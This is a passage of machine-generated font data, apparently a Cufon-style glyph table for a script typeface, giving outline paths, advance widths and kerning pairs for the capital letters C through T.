16,192,-174,353,-174,482v0,91,14,167,43,227v36,75,91,113,164,113v62,0,134,-24,215,-71v121,-70,225,-186,311,-350v25,-48,64,-59,78,2v-3,36,-123,231,-146,260v-88,115,-262,235,-441,239v-175,4,-314,-177,-314,-358v0,-169,17,-255,95,-431v64,-146,148,-266,243,-362v110,-111,219,-166,327,-166v46,0,160,50,153,93","w":849,"k":{"\u00d0":613,"\u00c1":66,"\u00c0":264,"\u00a2":78,"\u00d1":590,"\u00c9":30,"~":565,"z":27,"y":-51,"x":29,"w":-60,"v":-22,"u":-82,"t":90,"s":-97,"r":-76,"q":-39,"p":-70,"o":-66,"n":-90,"m":-158,"l":-78,"k":-110,"j":94,"i":-59,"h":-84,"g":-24,"f":-101,"e":-66,"d":42,"c":-67,"b":-113,"`":139,"Z":34,"W":210,"V":124,"S":69,"R":21,"Q":-124,"O":-127,"N":131,"M":137,"L":70,"K":-154,"J":45,"I":-43,"H":50,"G":-123,"F":-114,"E":33,"C":-120,"B":-29,"A":-72,"?":127,";":232,":":331,"9":-57,"8":87,"6":-74,"5":49,"4":-86,"3":-23,"2":41,"1":31,"0":-119,"\/":106,".":104,"-":639,",":173,")":146,"(":-59,"&":35,"%":88,"$":52,"#":200}},"D":{"d":"491,149v-67,0,-114,-12,-142,-33v-25,-19,8,-56,31,-51v46,10,69,14,70,14v145,0,285,-73,418,-219v131,-143,196,-288,196,-435v0,-120,-49,-216,-146,-290v-157,-120,-384,-125,-605,-60v-101,29,-185,66,-253,113v-68,47,-106,70,-115,70v-39,0,-58,-18,-58,-54v0,-23,30,-52,89,-86v192,-112,398,-168,618,-168v142,0,267,42,376,125v119,91,179,207,179,347v0,170,-66,332,-197,485v-137,161,-291,242,-461,242xm97,-469v0,-65,45,-383,93,-373v36,0,54,20,54,59v0,29,-29,133,-30,144v-19,105,-29,200,-29,286v0,283,49,424,148,424v13,0,26,-2,40,-7v-30,53,-57,80,-81,80v-68,0,-119,-67,-156,-201v-38,-137,-39,-254,-39,-412","w":1184,"k":{"\u00d0":-114,"\u00c1":118,"\u00c0":323,"\u00a2":-167,"\u00d1":-139,"\u00c9":127,"z":-62,"y":-53,"x":-107,"w":-74,"v":-141,"u":-76,"t":-74,"s":-105,"r":-121,"q":-27,"p":-81,"o":-57,"n":-89,"m":-165,"l":-100,"k":-125,"j":30,"i":-75,"h":-92,"f":-89,"e":-54,"d":56,"c":-54,"b":-118,"`":131,"Z":54,"Y":-25,"W":-176,"V":-107,"U":-45,"T":-28,"S":-135,"R":-89,"Q":-138,"P":-85,"O":-137,"N":-142,"M":-156,"L":48,"K":-176,"J":243,"I":103,"H":-71,"G":-132,"F":-120,"E":-116,"D":-148,"C":-122,"B":-192,"A":-57,"@":-58,"?":-62,";":165,":":80,"9":-99,"8":-154,"7":88,"6":-77,"5":-105,"4":-70,"2":-139,"0":-140,"\/":127,".":201,"-":-91,",":263,")":214,"(":-76,"&":49,"%":108,"$":-119,"#":-33}},"E":{"d":"618,-1112v98,-13,199,26,200,110v0,24,-8,50,-25,78v-9,16,-21,24,-34,24v-29,0,-24,-32,-24,-58v0,-57,-34,-57,-105,-57v-108,0,-260,35,-457,104v-9,3,-44,27,-107,69v-63,42,-98,63,-106,63v-35,0,-53,-18,-53,-53v0,-31,71,-77,214,-138v98,-42,191,-77,280,-105v30,-9,102,-22,217,-37xm287,125v-142,-7,-180,-82,-180,-241v0,-51,11,-211,11,-258v-34,19,-56,29,-67,29v-29,0,-44,-19,-44,-57v0,-22,38,-50,114,-85v3,-49,9,-130,21,-243v15,-141,44,-212,81,-212v36,0,54,21,54,64r-25,107v-14,63,-29,150,-45,261v23,-3,198,-66,250,-66v99,0,157,24,172,71r-9,46v-27,2,-47,-6,-61,-25v-8,-12,-32,-18,-71,-18v-42,0,-289,51,-286,81v-18,69,-2,221,0,310v3,100,16,159,99,159v44,0,115,-13,212,-38v101,-27,179,-40,233,-40v93,0,189,72,184,165r-44,25v-31,-71,-88,-106,-171,-106v-86,0,-343,75,-428,71","w":970,"k":{"\u00d0":318,"\u00c1":64,"\u00c2":65,"\u00c0":304,"\u00a2":104,"\u00d1":308,"\u00c9":62,"~":655,"y":56,"x":-26,"w":24,"v":173,"t":220,"p":-34,"o":29,"n":-55,"m":-85,"l":36,"j":138,"i":50,"h":-40,"g":52,"f":94,"c":27,"b":31,"a":-29,"`":130,"Z":-49,"Y":21,"X":-79,"W":159,"V":112,"T":24,"S":62,"Q":23,"N":133,"M":109,"L":-79,"K":-42,"J":131,"I":-28,"H":-103,"F":52,"E":73,"D":106,"B":-47,"A":-51,"@":291,"?":179,";":79,":":149,"9":-25,"8":62,"7":30,"5":-57,"4":221,"3":-20,"2":-80,"1":-48,"0":39,"\/":-36,".":139,"-":357,")":42,"(":51,"&":163,"%":-54,"$":72,"#":299,"!":114}},"F":{"d":"701,-1135v99,0,210,44,210,131v0,40,-15,63,-44,69v-17,-9,-26,-26,-26,-51v0,-39,-53,-59,-160,-59v-110,0,-368,71,-454,110v-10,4,-155,87,-205,114v-21,12,-36,19,-47,22v-33,0,-49,-17,-49,-51v0,-35,35,-66,105,-93v323,-128,546,-192,670,-192xm239,-881v0,151,-75,270,-75,401v33,-3,151,-33,189,-33v63,0,165,26,161,80r-25,27v-32,0,-86,-35,-121,-36v-37,-2,-213,21,-208,46v0,364,41,539,123,526v31,-5,54,7,54,34v0,19,-34,39,-55,38v-139,0,-209,-183,-211,-550r-14,7v-39,21,-61,32,-65,32v-33,0,-50,-15,-50,-44v0,-28,15,-54,50,-66r86,-30v11,-52,33,-337,35,-343v16,-93,43,-140,80,-140v31,0,46,17,46,51","w":648,"k":{"\u00c1":264,"\u00c2":136,"\u00c0":630,"\u00a2":-274,"\u00d1":-32,"\u00c9":330,"~":372,"z":153,"y":74,"x":147,"w":52,"v":37,"u":48,"t":52,"s":24,"r":25,"q":135,"p":42,"o":73,"n":37,"m":-41,"l":-281,"k":-281,"j":263,"i":-221,"h":-242,"g":137,"f":-120,"e":86,"d":194,"c":82,"b":-233,"a":177,"`":-236,"Z":-207,"Y":-345,"X":-290,"W":-159,"V":-224,"U":-306,"T":-344,"S":-137,"R":-329,"Q":-238,"P":-341,"O":-239,"N":-187,"M":-214,"L":-182,"K":-343,"J":-243,"I":-341,"H":-205,"G":-159,"F":-231,"E":-212,"D":-176,"C":-98,"B":-171,"A":88,"@":75,"?":-119,";":261,":":205,"9":-154,"8":-90,"7":-303,"6":-53,"5":-179,"4":-142,"3":-90,"2":-83,"1":-208,"0":-204,"\/":139,".":403,",":251,")":-143,"(":-138,"&":25,"%":40,"$":-305,"#":87,"!":-170}},"G":{"d":"760,-1124v0,30,-31,69,-63,51v-43,-24,-84,-38,-125,-38v-71,0,-146,39,-225,117v-93,91,-169,202,-228,332v-60,134,-90,264,-90,390v0,81,18,157,55,227v43,82,99,123,166,123v147,0,293,-91,437,-273v130,-165,202,-320,215,-464v4,-47,-4,-71,-23,-71v-25,0,-150,68,-376,205v-46,28,-74,42,-84,42v-31,0,-47,-16,-47,-49v0,-35,78,-91,235,-167v149,-72,244,-108,285,-108v67,0,101,40,101,121v1,46,-18,118,-25,165v-36,242,-51,426,-51,550v0,113,19,168,58,163v34,-5,51,6,51,33v0,28,-18,42,-55,42v-100,0,-150,-92,-150,-276v0,-60,11,-150,32,-269v-83,145,-161,246,-233,306v-99,83,-221,125,-368,125v-102,0,-182,-53,-240,-159v-47,-85,-70,-180,-70,-283v0,-193,61,-388,182,-586v138,-226,300,-339,487,-339v51,0,149,43,149,90","w":1091,"k":{"\u00d0":-34,"\u00c2":68,"\u00c0":123,"\u00a2":-69,"\u00d1":-59,"\u00c9":48,"~":67,"z":-20,"x":-66,"v":-86,"u":-29,"s":-43,"r":-70,"q":-30,"p":-97,"n":-43,"m":-99,"l":-23,"k":-38,"j":57,"e":-29,"d":50,"c":-23,"b":-27,"a":-20,"`":384,"Y":120,"X":-27,"W":-85,"V":-47,"U":62,"T":307,"S":-50,"R":147,"Q":-40,"P":75,"O":-41,"N":-81,"M":-77,"L":-32,"K":-97,"J":-370,"I":26,"H":-57,"G":-26,"F":-31,"E":-33,"D":-99,"C":-32,"B":-127,"A":-83,"@":25,";":69,":":131,"8":-80,"7":80,"5":-22,"3":-25,"2":-92,"1":-34,"0":-52,"\/":-24,".":121,",":71,")":53,"&":96,"%":-41,"$":-29,"#":59,"!":68}},"H":{"d":"-8,194v-35,0,-102,-36,-97,-72v0,-2,3,-13,9,-33r41,0v15,22,28,33,40,33v61,0,108,-77,141,-231v19,-90,31,-183,35,-280v-59,30,-98,45,-118,45v-29,0,-43,-15,-43,-46v0,-25,19,-45,58,-61v9,-3,39,-12,90,-26v5,1,9,2,13,3v7,-151,0,-119,-4,-317v-2,-70,-15,-159,-44,-267v-14,-54,-8,-113,49,-113v28,0,49,67,70,201v27,174,17,289,22,461v149,-47,266,-75,351,-83v227,-20,177,-25,306,-14v11,-100,31,-205,60,-316v39,-146,78,-219,116,-219v52,0,51,75,34,122v-13,36,-33,78,-48,128v-26,87,-60,204,-64,299v41,19,68,34,83,47v26,22,39,51,39,86v0,33,-30,77,-59,76v-17,0,-28,-13,-33,-39r20,-42v-5,-21,-24,-35,-58,-43v-12,24,6,281,10,314v18,144,51,216,98,216v13,0,24,-7,34,-20r47,0v5,21,8,33,8,35v3,31,-57,61,-89,60v-96,0,-158,-85,-187,-255v-7,-42,-14,-162,-21,-360v-224,-18,-347,13,-649,94v-6,83,-24,196,-54,341v-39,184,-107,276,-206,276","w":1270,"k":{"\u00c1":63,"\u00c2":25,"\u00c0":368,"\u00a2":-41,"\u00d1":-41,"~":167,"z":-87,"x":-68,"w":-48,"u":-89,"s":-56,"r":-79,"q":-61,"p":-55,"o":-52,"n":-111,"m":-144,"l":-22,"k":-47,"j":117,"h":-69,"f":63,"e":-71,"d":-36,"c":-57,"b":-27,"a":-78,"`":94,"Z":-77,"X":-102,"W":35,"V":30,"U":-22,"R":-33,"Q":-38,"P":-30,"O":-45,"L":-78,"K":-99,"J":59,"I":-33,"G":-26,"D":-23,"C":-59,"B":-77,"A":-49,"@":39,"?":63,";":135,":":63,"6":-36,"5":-82,"4":40,"3":-72,"2":-106,"0":-45,"\/":-34,".":80,",":99,")":70,"&":93,"%":-51,"#":72,"!":83}},"I":{"d":"474,-1205v82,0,252,45,252,114v0,76,-53,62,-69,11v-11,-34,-64,-50,-155,-50v-183,0,-413,98,-519,155v-28,15,-54,-6,-54,-42v0,-40,81,-83,242,-128v141,-40,242,-60,303,-60xm397,-44v83,0,161,-5,233,19v69,23,104,56,104,99v0,36,-13,41,-60,40v-10,-57,-67,-86,-171,-86v-119,0,-259,35,-419,104v-33,14,-53,21,-60,21v-35,0,-52,-18,-52,-53v0,-39,108,-80,325,-125v-53,-69,-80,-209,-80,-419v0,-143,13,-289,31,-437v5,-42,8,-105,20,-187v3,-23,38,-63,65,-63v39,0,54,24,47,71v-51,317,-76,537,-76,660v0,57,3,111,8,164v13,128,42,192,85,192","w":737,"k":{"\u00d0":263,"\u00c0":294,"\u00d1":239,"\u00c9":-37,"~":339,"z":-102,"y":-34,"x":-101,"w":-66,"v":86,"u":-107,"t":124,"s":-70,"r":-104,"q":-92,"p":-98,"o":-66,"n":-136,"m":-167,"l":-46,"k":-75,"j":75,"i":-30,"h":-102,"g":-37,"f":31,"e":-86,"d":-72,"c":-71,"b":-53,"a":-108,"`":299,"Z":-110,"Y":-48,"X":-146,"W":181,"V":195,"U":-54,"T":37,"Q":-58,"O":-64,"N":97,"M":97,"L":-128,"K":-118,"J":-31,"I":-101,"H":-49,"G":-62,"E":32,"D":56,"C":-82,"B":-109,"A":-97,"@":255,"?":123,";":74,":":48,"9":158,"7":-78,"6":-60,"5":-117,"4":102,"3":-96,"2":-142,"1":-50,"0":-38,"\/":-80,".":40,"-":287,"&":76,"%":-98,"#":202,"!":52}},"J":{"d":"575,-1246v81,0,178,53,173,129v0,9,-5,21,-15,35v-18,23,-35,23,-52,2v6,-79,-42,-92,-134,-92v-97,0,-240,40,-429,121v-33,15,-52,22,-58,22v-35,0,-53,-14,-53,-43v0,-42,84,-83,251,-123v141,-34,247,-51,317,-51xm325,173v-36,81,-86,155,-150,221v-79,81,-157,125,-236,130r-74,5v-67,0,-134,-27,-201,-80v-71,-57,-103,-120,-108,-189v-5,-63,55,-86,62,-24v12,100,118,201,228,201v184,0,322,-109,414,-328v69,-165,103,-360,103,-585v0,-192,-14,-392,-46,-601v-6,-38,25,-83,63,-83v27,0,45,14,54,41v3,10,5,34,6,72v5,130,8,243,8,338v0,401,-41,695,-123,882","w":704,"k":{"\u00d0":94,"\u00c1":265,"\u00c2":194,"\u00c0":362,"\u00a2":-36,"\u00d1":70,"\u00c9":186,"~":192,"z":123,"y":101,"x":84,"w":124,"v":64,"u":100,"t":123,"s":85,"r":83,"q":126,"p":129,"o":115,"n":100,"m":34,"l":-101,"k":-95,"j":-110,"i":120,"h":-51,"g":143,"f":82,"e":98,"d":163,"c":104,"b":-29,"a":123,"`":187,"Z":124,"Y":-61,"X":-175,"W":38,"V":66,"U":-28,"S":65,"R":-32,"P":-53,"N":40,"M":41,"K":-142,"J":-116,"I":-145,"H":-51,"G":72,"F":47,"E":39,"C":63,"A":103,"@":149,"?":105,";":284,":":272,"9":99,"8":44,"7":-122,"6":109,"5":82,"4":63,"3":81,"2":38,"1":126,"0":59,"\/":166,".":259,"-":118,",":262,"(":105,"&":199,"%":148,"$":-54,"#":163,"!":36}},"K":{"d":"876,-6v3,51,-114,89,-174,85v-95,-7,-215,-95,-360,-272v-35,-44,-86,-107,-157,-185v-53,-58,-105,-91,-154,-103r-6,-43v34,-28,44,-24,90,-27v66,-5,145,-47,238,-120v79,-62,146,-127,199,-196r25,-43v68,-120,112,-178,132,-178v22,0,47,37,46,56v-2,33,-47,105,-131,221v-74,102,-290,271,-417,312v11,9,51,60,120,152v57,76,120,147,189,213v95,91,171,141,226,141v47,0,58,-23,114,-46xm144,148v-69,0,-123,-44,-162,-132v-40,-91,-55,-184,-55,-319v0,-171,11,-339,33,-502v27,-203,62,-304,106,-304v37,0,54,20,51,61v-85,214,-112,496,-99,813v2,43,12,102,34,177v27,90,54,135,83,135v26,0,48,5,66,17v-4,36,-23,54,-57,54","w":768,"k":{"\u00d0":300,"\u00c1":-93,"\u00c2":-113,"\u00c0":238,"\u00a2":-43,"\u00d1":279,"\u00c9":-202,"~":120,"z":-208,"y":-170,"x":-204,"w":-178,"v":-30,"u":-214,"s":-182,"r":-203,"q":-220,"p":-195,"o":-186,"n":-229,"m":-267,"l":-169,"k":-205,"j":-23,"i":-160,"h":-211,"g":-175,"f":-74,"e":-206,"d":-179,"c":-192,"b":-211,"a":-207,"`":-35,"Z":-223,"Y":-131,"X":-246,"V":-39,"U":-163,"T":-126,"S":-137,"R":-132,"Q":-197,"P":-136,"O":-199,"N":-37,"M":-58,"L":-170,"K":-245,"J":-37,"I":-145,"H":-123,"G":-198,"F":-112,"E":-95,"D":-89,"C":-216,"B":-217,"A":-178,"@":97,":":-65,"9":57,"8":-132,"7":-137,"6":-185,"5":-223,"4":63,"3":-232,"2":-241,"1":-81,"0":-178,"\/":-163,".":-129,"-":319,",":-55,")":-53,"(":-149,"&":-70,"%":-181,"$":-75,"#":41,"!":-29}},"L":{"d":"138,-978v-2,-84,59,-163,140,-163v37,0,86,23,147,68v65,48,98,91,98,130v0,33,-17,50,-50,50v-24,0,-54,-30,-91,-89v-37,-59,-75,-89,-113,-89v-25,0,-36,38,-33,114v12,265,18,397,18,398r0,305v0,87,-22,170,-66,249v185,-67,348,-101,490,-101v59,0,120,17,184,50v76,40,115,87,115,144v0,29,-24,44,-71,43r2,-39v5,-69,-77,-103,-247,-103v-135,0,-283,27,-442,82v-4,2,-47,19,-130,52v-69,28,-108,42,-116,42v-35,0,-53,-17,-53,-50v0,-17,36,-44,107,-81v13,-7,20,-11,23,-13v79,-61,119,-208,119,-439v0,-130,-3,-226,-8,-289v-15,-191,-23,-271,-23,-271","w":909,"k":{"\u00d0":486,"\u00c1":-47,"\u00c2":-40,"\u00c0":219,"\u00a2":286,"\u00d1":462,"\u00c9":-137,"~":595,"z":-130,"y":-64,"x":-129,"w":-91,"v":58,"u":-134,"t":102,"s":-96,"r":-130,"q":-122,"p":-131,"o":-92,"n":-165,"m":-196,"l":-67,"k":-99,"j":44,"i":-60,"h":-127,"g":-67,"e":-111,"d":-97,"c":-98,"b":-94,"a":-140,"`":339,"Z":-135,"X":-168,"W":156,"V":277,"U":-81,"T":203,"S":-35,"R":61,"Q":-83,"P":27,"O":-89,"N":69,"M":67,"L":-162,"K":-144,"J":138,"I":-113,"H":-186,"G":-87,"D":26,"C":-106,"B":-136,"A":-135,"@":199,"?":91,"9":-109,"8":-39,"7":-59,"6":-87,"5":-147,"4":359,"3":-124,"2":-173,"1":-127,"0":-66,"\/":-122,".":-64,"-":509,",":-105,")":-29,"(":-45,"&":44,"%":-140,"$":253,"#":170,"!":21}},"M":{"d":"1579,91v20,5,60,-53,78,-50v24,4,41,26,32,53v-3,32,-83,71,-121,71v-56,0,-98,-26,-125,-79v-47,-92,-76,-373,-85,-844v-5,-225,-34,-337,-89,-337v-52,0,-117,97,-198,290v-71,168,-211,602,-202,791v2,46,-21,113,-62,113v-24,0,-49,-36,-49,-61v0,-72,18,-303,18,-375v0,-135,-5,-250,-14,-343v-17,-175,-45,-262,-84,-262v-37,0,-89,73,-154,221v-119,270,-192,482,-213,634v-6,42,-8,103,-21,182v-6,34,-29,50,-64,50v-35,0,-53,-20,-53,-60v0,-270,54,-545,54,-858v-1,-215,-48,-220,-145,-106r-84,109v-33,41,-57,61,-73,61v-35,0,-52,-19,-52,-57v0,-32,46,-85,139,-158v91,-72,152,-108,183,-108v62,0,104,54,117,162v13,107,11,277,-1,464v139,-411,266,-616,380,-616v78,0,128,85,150,256v9,64,13,181,13,352v48,-225,84,-344,179,-524v83,-157,166,-234,245,-234v96,0,150,103,162,309r41,710v19,163,51,244,98,244","w":1701,"k":{"\u00d0":66,"\u00c1":-28,"\u00c2":-33,"\u00c0":239,"\u00a2":33,"\u00d1":43,"\u00c9":69,"~":188,"z":-113,"y":46,"x":-126,"w":-86,"v":39,"u":-127,"t":89,"s":-89,"r":-124,"q":-99,"p":-126,"o":-79,"n":-155,"m":-187,"l":-54,"k":-88,"j":47,"i":-50,"h":-119,"g":42,"e":-99,"d":-84,"c":-82,"b":-50,"a":-131,"`":193,"Z":-127,"X":-160,"W":23,"V":56,"U":-73,"T":52,"S":-22,"Q":-62,"P":22,"O":-67,"N":30,"M":35,"L":-153,"K":-133,"J":147,"I":-105,"H":-176,"G":-71,"C":-93,"B":-128,"A":-126,"@":119,"?":92,";":21,":":37,"9":-100,"8":-28,"7":-52,"6":-79,"5":-140,"4":30,"3":-111,"2":-168,"1":-119,"0":-52,"\/":-114,".":142,"-":90,",":-47,"(":-38,"&":77,"%":-132,"$":60,"#":155,"!":31}},"N":{"d":"1092,-38v3,46,-65,103,-110,103v-71,0,-125,-63,-157,-190v-46,-182,-46,-481,-83,-760v-14,-104,-41,-156,-72,-156v-23,0,-69,91,-140,272v-77,199,-126,335,-149,409v-47,157,-71,300,-70,428v1,50,-18,75,-57,75v-37,0,-55,-23,-55,-70v0,-72,28,-306,26,-378v-2,-81,15,-339,15,-420v0,-132,-14,-198,-43,-198v-35,0,-103,60,-202,181v-22,27,-36,43,-43,46v-29,15,-55,-26,-56,-51v0,-36,45,-89,135,-158v87,-67,148,-100,184,-100v77,0,115,54,114,163r-5,397r109,-321v87,-231,175,-346,263,-346v60,0,101,47,124,140v5,23,16,92,25,208v6,80,12,221,34,420v24,220,62,329,105,329v11,2,49,-36,75,-39","w":1121,"k":{"\u00d0":79,"\u00c1":21,"\u00c0":351,"\u00a2":48,"\u00d1":55,"\u00c9":-82,"~":208,"z":-116,"y":-72,"x":-99,"w":-82,"v":58,"u":-121,"t":97,"s":-87,"r":-107,"q":-121,"p":-98,"o":-92,"n":-135,"m":-174,"l":-57,"k":-94,"j":82,"i":-52,"h":-99,"g":-76,"f":38,"e":-111,"d":-65,"c":-98,"b":-105,"a":-109,"`":219,"Z":-108,"X":-130,"W":39,"V":81,"U":-51,"T":78,"S":-25,"R":43,"Q":-90,"P":37,"O":-91,"N":55,"M":44,"L":-39,"K":-134,"J":206,"G":-89,"D":31,"C":-106,"B":-103,"A":-58,"@":124,"?":117,";":112,":":25,"9":96,"8":-21,"7":-21,"6":-73,"5":-102,"4":33,"3":-121,"2":-123,"1":31,"0":-70,"\/":-43,"-":101,",":83,")":67,"(":-37,"&":30,"%":-61,"$":78,"#":148,"!":104}},"O":{"d":"278,133v-122,0,-211,-50,-268,-151v-79,-140,-87,-372,-25,-553r59,-166v-5,-132,39,-245,132,-339v90,-92,195,-134,315,-125v107,7,196,70,266,189v60,101,90,206,90,314v0,190,-45,367,-135,532v-109,199,-254,299,-434,299xm187,-634v24,-1,68,-19,69,14v0,34,-21,51,-62,51v-37,0,-69,-11,-94,-34v-43,102,-65,198,-65,287v0,95,17,176,51,244v42,84,102,126,179,126v155,0,278,-87,369,-262v77,-145,115,-306,115,-483v0,-97,-23,-188,-71,-273v-55,-98,-127,-149,-213,-159v-157,-18,-342,169,-341,317v-7,-37,61,-115,97,-115v24,0,50,27,49,50v0,19,-22,54,-66,106v-44,52,-67,81,-67,88v-2,7,42,46,50,43","w":937,"k":{"\u00d0":-45,"\u00c1":182,"\u00c2":83,"\u00c0":387,"\u00a2":-110,"\u00d1":-69,"\u00c9":162,"~":26,"x":-67,"v":-84,"s":-39,"r":-68,"q":28,"n":-28,"m":-101,"l":-48,"k":-67,"j":84,"h":-34,"g":46,"f":-27,"d":115,"b":-58,"a":68,"`":62,"Z":80,"Y":-63,"X":50,"W":-107,"V":-82,"U":-66,"T":-65,"S":-77,"R":-106,"Q":-71,"P":-101,"O":-70,"N":-108,"M":-109,"L":89,"K":-123,"J":96,"I":-20,"G":-62,"F":-91,"E":-106,"D":-131,"C":-55,"B":-151,"?":-45,";":228,":":146,"9":-42,"8":-105,"5":-45,"3":41,"2":-111,"0":-82,"\/":168,".":236,"-":-21,",":303,")":198,"&":104,"%":150,"$":-87,"!":42}},"P":{"d":"729,-1273v231,0,395,137,392,357v-1,100,-53,204,-158,313v-96,99,-194,165,-295,197v-101,32,-175,49,-221,49v-73,1,-157,-48,-157,-118v0,-20,7,-38,22,-53r46,0v-3,55,19,83,66,83v132,0,266,-54,401,-161v141,-112,211,-231,211,-356v0,-80,-37,-141,-110,-183v-61,-35,-139,-53,-232,-53v-123,0,-246,35,-371,104v-78,43,-183,118,-315,226v-25,20,-41,30,-48,30v-27,1,-62,-30,-62,-59v0,-25,104,-112,128,-127v143,-94,251,-156,324,-185v107,-43,233,-64,379,-64xm155,9v-43,-114,-47,-288,-47,-440v0,-191,8,-344,23,-461v7,-54,27,-81,60,-81v36,0,54,19,54,56v0,35,-27,149,-29,168v-15,121,-25,235,-25,342v0,337,54,506,161,506v5,0,11,0,16,-1r31,30v-9,31,-27,46,-53,46v-89,0,-150,-56,-191,-165","w":1142,"k":{"\u00d0":224,"\u00c1":637,"\u00c2":227,"\u00c0":841,"\u00a2":-93,"\u00d1":196,"\u00c9":773,"z":176,"y":141,"w":162,"v":66,"u":153,"t":165,"s":195,"r":35,"q":320,"p":93,"o":216,"n":156,"m":57,"l":-39,"k":-43,"j":122,"g":309,"f":107,"e":248,"d":370,"c":245,"a":366,"`":-50,"Z":44,"Y":-99,"X":-38,"W":-51,"V":-71,"U":-88,"T":-102,"R":-130,"P":-128,"N":-85,"M":-89,"L":70,"K":-107,"I":-87,"H":56,"F":-104,"E":-106,"D":-118,"C":58,"B":-112,"A":285,"@":143,"?":-31,";":457,":":398,"9":25,"8":-53,"7":-43,"6":94,"4":95,"3":70,"2":-89,"1":-21,"0":-20,"\/":449,".":845,"-":254,",":684,")":119,"(":55,"&":169,"%":258,"$":-116,"#":23,"!":64}},"Q":{"d":"819,78v0,51,-75,100,-127,100v-44,0,-139,-46,-216,-98v-61,33,-127,49,-198,49v-122,0,-211,-50,-268,-151v-79,-140,-87,-372,-25,-553r59,-166v-5,-132,39,-245,132,-339v90,-92,195,-134,315,-126v107,7,195,71,266,189v131,216,105,462,17,710v-54,153,-133,267,-230,343v57,35,110,52,159,52v25,0,39,1,39,-9v-1,-40,6,-48,26,-66v34,12,51,34,51,65xm187,-638v24,-1,68,-19,69,14v0,34,-21,51,-62,51v-37,0,-69,-12,-94,-35v-43,103,-65,198,-65,287v0,95,17,176,51,245v42,84,102,126,179,126v45,0,88,-8,129,-24v-65,-40,-125,-60,-182,-60v-50,0,-75,-16,-75,-47v0,-33,26,-50,79,-50v62,0,147,39,254,116v90,-62,161,-164,212,-306v45,-123,67,-247,67,-374v0,-97,-23,-188,-71,-273v-55,-98,-127,-149,-213,-159v-156,-19,-342,169,-341,316v-7,-36,61,-115,97,-115v24,0,50,28,49,50v0,19,-22,55,-66,107v-44,52,-67,81,-67,88v-2,7,42,46,50,43","w":937,"k":{"\u00d0":-44,"\u00c1":61,"\u00c2":44,"\u00c0":317,"\u00a2":-111,"\u00d1":-68,"\u00c9":78,"~":26,"z":-38,"x":-75,"v":-91,"u":-52,"s":-44,"r":-74,"q":-34,"p":-49,"n":-79,"m":-112,"l":-54,"k":-70,"j":76,"h":-48,"g":22,"f":-33,"e":-26,"b":-63,"a":-58,"`":60,"Z":-57,"Y":-67,"X":-88,"W":-113,"V":-87,"U":-73,"T":-71,"S":-82,"R":-112,"Q":-74,"P":-108,"O":-76,"N":-115,"M":-109,"L":-82,"K":-129,"J":87,"I":-31,"H":-105,"G":-67,"F":-98,"E":-109,"D":-138,"C":-60,"B":-158,"A":-55,"?":-52,";":90,":":115,"9":-49,"8":-111,"5":-69,"3":-41,"2":-119,"1":-48,"0":-87,"\/":-42,".":154,",":54,")":52,"(":-23,"&":98,"%":-60,"$":-88,"!":36}},"R":{"d":"1120,40v0,52,-114,94,-176,94v-115,0,-233,-85,-356,-256v-35,-48,-76,-98,-125,-150v-53,-56,-88,-86,-105,-91v-57,-15,-81,-37,-78,-67v4,-41,103,-35,136,-18v133,-13,264,-71,394,-174v137,-109,210,-223,219,-342v11,-163,-126,-229,-302,-229v-195,0,-427,98,-696,295v-53,39,-82,59,-86,59v-29,0,-86,-40,-54,-71v90,-89,218,-169,385,-242v175,-76,328,-114,459,-114v232,0,394,119,375,351v-8,99,-67,205,-181,312v-146,137,-236,183,-426,231v92,131,186,246,311,355v57,51,114,76,169,76v49,0,59,-26,117,-52xm367,177v-139,0,-207,-145,-204,-435v2,-211,24,-421,67,-632v11,-53,33,-80,65,-80v33,0,50,19,50,56v0,47,-26,109,-40,169v-33,146,-55,332,-55,508v0,226,42,339,126,339v5,0,11,0,17,-1r29,30v-11,31,-30,46,-55,46","w":1111,"k":{"\u00d0":240,"\u00c2":-23,"\u00c0":296,"\u00a2":-118,"\u00d1":211,"\u00c9":-45,"z":-121,"y":-65,"x":-130,"w":-90,"u":-124,"t":89,"s":-96,"r":-124,"q":-123,"p":-118,"o":-90,"n":-147,"m":-180,"l":-101,"k":-116,"j":49,"i":-72,"h":-137,"g":-68,"e":-111,"d":-108,"c":-95,"b":-65,"a":-132,"`":-72,"Z":-146,"Y":-157,"X":-181,"W":-98,"V":-127,"U":-150,"T":-162,"S":-59,"R":-188,"Q":-98,"P":-185,"O":-105,"N":-139,"M":-143,"L":-156,"K":-168,"J":-53,"I":-150,"H":-147,"G":-102,"F":-163,"E":-164,"D":-177,"C":-123,"B":-164,"A":-126,"@":96,"?":-90,";":71,":":39,"9":-68,"8":-105,"7":-112,"6":-100,"5":-154,"4":34,"3":-139,"2":-177,"1":-84,"0":-81,"\/":-109,".":32,"-":270,"(":-61,"&":33,"%":-128,"$":-145}},"S":{"d":"815,-996v0,36,-31,115,-66,115v-22,0,-53,-31,-50,-55r10,-73v0,-62,-22,-93,-65,-93v-79,0,-202,68,-366,204v-167,138,-250,246,-250,321v0,32,33,58,98,78v31,10,115,27,250,50v119,21,205,44,259,70v85,41,128,98,128,173v0,88,-49,172,-151,248v-113,84,-189,109,-319,109v-112,0,-248,-89,-248,-198v0,-26,26,-113,49,-108v24,0,36,12,36,35v0,12,-13,54,-13,62v-1,71,85,114,166,114v89,0,174,-26,255,-79v89,-58,133,-127,133,-206v0,-43,-36,-77,-108,-100v-109,-34,-324,-50,-499,-102v-89,-26,-132,-73,-132,-128v0,-137,93,-279,278,-425v174,-137,324,-205,450,-205v103,0,155,64,155,193","w":847,"k":{"\u00d0":70,"\u00c1":94,"\u00c2":41,"\u00c0":329,"\u00a2":-31,"\u00d1":63,"~":639,"v":62,"u":-50,"t":97,"r":-26,"q":-39,"p":-26,"o":-31,"n":-58,"m":-111,"l":-44,"k":-60,"j":158,"h":-42,"f":-42,"e":-45,"d":31,"c":-43,"b":-68,"Y":-111,"X":-71,"W":25,"V":-29,"U":-85,"T":-108,"S":50,"R":-129,"Q":-72,"P":-125,"O":-75,"M":-24,"L":57,"K":-107,"I":-103,"H":30,"G":-73,"F":-87,"E":-68,"D":-38,"C":-73,"A":-29,"@":59,"?":36,";":201,":":133,"9":23,"8":64,"7":-66,"6":-30,"4":-57,"3":-52,"0":-67,"\/":78,".":80,"-":90,",":155,")":90,"&":57,"%":60,"$":-65,"#":220,"!":64}},"T":{"d":"1028,-1056v0,51,-31,92,-73,101v-15,0,-20,-13,-16,-39v10,-25,15,-40,15,-43v0,-54,-95,-81,-286,-81v-129,0,-284,28,-453,111r-173,85v-55,25,-91,38,-106,38v-36,0,-54,-16,-54,-48v0,-33,78,-79,235,-136v205,-75,365,-132,596,-132v65,0,127,9,187,28v85,26,128,65,128,116